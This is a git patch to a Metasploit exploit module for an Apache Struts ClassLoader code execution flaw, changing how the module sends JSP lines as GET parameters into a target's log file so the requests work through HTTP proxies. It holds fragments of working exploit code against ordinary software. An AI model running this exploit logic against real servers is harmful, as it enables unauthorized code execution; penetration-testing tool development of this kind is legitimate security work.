From de09559cc833f6f0e671180fa2e35c024bbeb2ff Mon Sep 17 00:00:00 2001
From: julianvilas <julian.vilas@gmail.com>
Date: Wed, 4 Feb 2015 15:32:14 +0100
Subject: [PATCH] Change HTTP requests to succeed when going through HTTP
 proxies

---
 .../multi/http/struts_code_exec_classloader.rb      | 13 ++++++++++---
 1 file changed, 10 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index 3ecb7193d5..7c8a6dc5b7 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -97,9 +97,13 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def dump_line(uri, cmd = "")
     res = send_request_cgi({
-      'uri'     => uri+cmd,
+      'uri'     => uri,
+      'encode_params' => false,
+      'vars_get' => {
+        cmd => ""
+      },
       'version' => '1.1',
-      'method'  => 'GET',
+      'method'  => 'GET'
     })
 
     res
@@ -232,8 +236,11 @@ class Metasploit3 < Msf::Exploit::Remote
     # Dump the JSP to the log file
     print_status("#{peer} - Dumping JSP into the logfile...")
     random_request = rand_text_alphanumeric(3 + rand(3))
+
+    uri = normalize_uri("/", random_request)
+
     jsp.each_line do |l|
-      unless dump_line(random_request, l.chomp)
+      unless dump_line(uri, l.chomp)
         fail_with(Failure::Unknown, "#{peer} - Missed answer while dumping JSP to logfile...")
       end
     end